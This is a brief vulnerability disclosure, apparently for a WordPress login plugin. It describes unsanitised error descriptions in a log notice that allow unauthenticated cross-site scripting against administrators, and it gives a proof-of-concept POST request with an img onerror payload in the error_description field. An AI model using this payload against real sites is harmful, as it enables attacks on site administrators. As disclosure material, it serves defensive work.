The plugin does not sanitise error descriptions before outputting them in the log notice, which could allow unauthenticated users to perform Cross-Site Scripting attacks against a logged in administrator
POST / HTTP/1.1
Content-Length: 242
Content-Type: application/x-www-form-urlencoded
error=2&error_description=<img+src=a+onerror=alert(%26quot;XSS_Proof_of_Concept!%26quot;)>&error_uri=https%3A%2F%2Flogin.microsoftonline.com%2Ferror%3Fcode%3D700054&state=https%3A%2F%2F192.168.88.176%2Fwp-login.php%3Flogin_errors%3DCHECK_LOG2